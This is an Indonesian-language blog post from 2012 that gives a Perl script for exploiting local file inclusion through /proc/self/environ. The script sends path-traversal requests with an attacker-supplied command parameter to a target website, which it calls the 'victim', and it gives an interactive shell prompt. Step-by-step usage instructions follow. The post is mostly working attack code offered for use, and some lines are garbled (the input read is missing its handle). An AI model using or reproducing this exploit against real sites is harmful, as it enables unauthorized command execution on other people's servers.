LFI Remote Execute in PERL

Sabtu, 31 Maret 2012

Share This Article On :
Script berikut untuk menjalankan/mengeksekusi LFI proc/elft/environ secara simple di shell.
#! /usr/bin/perl
use LWP;
use HTTP::Request;
if (@ARGV < 1)
{
print "\n==========================================\n";
print " LFI Command Execution \n";
print "==========================================\n";
print "Usage: perl LFI.pl (without http:://)\n";
print "Ex. perl FLI.pl www.korban.com/index.php?page=\n";
exit;
}
$host=$ARGV[0];
$lfi = "..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron";
print "Try to Execution Command!\n";
print "iDSc-shell# ";
chomp( $cmd = );
while($cmd !~ "exit")
{
$content = "";
$ua = LWP::UserAgent->new();
$ua->agent('');
$request = HTTP::Request->new (GET => "http://".$host.$lfi."&cmd=".$cmd);
$response = $ua->request ($request);
$content = $response->content;
print $content."\n";
print "iDSc-shell# ";
chomp( $cmd = );
}
Cara menggunakannya adalah:
1. Install perl di komputer anda / komputer target (bersyukurlah kalau sudah terinstall)
2. Save file di atas: “LFI.pl”
3. Kemudian jalankan dengan perintah: “perl FLI.pl www.targetwebsiteanda.com/index.php?page=\n”
4. Tunggu hasilnya :)
Semoga berhasil & selamat mengeksplore!

Tidak ada komentar:

Posting Komentar

 
© Copyright 2010-2011 Media Pengetahuan All Rights Reserved.
Template Design by Herdiansyah Hamzah | Published by Borneo Templates | Powered by Blogger.com.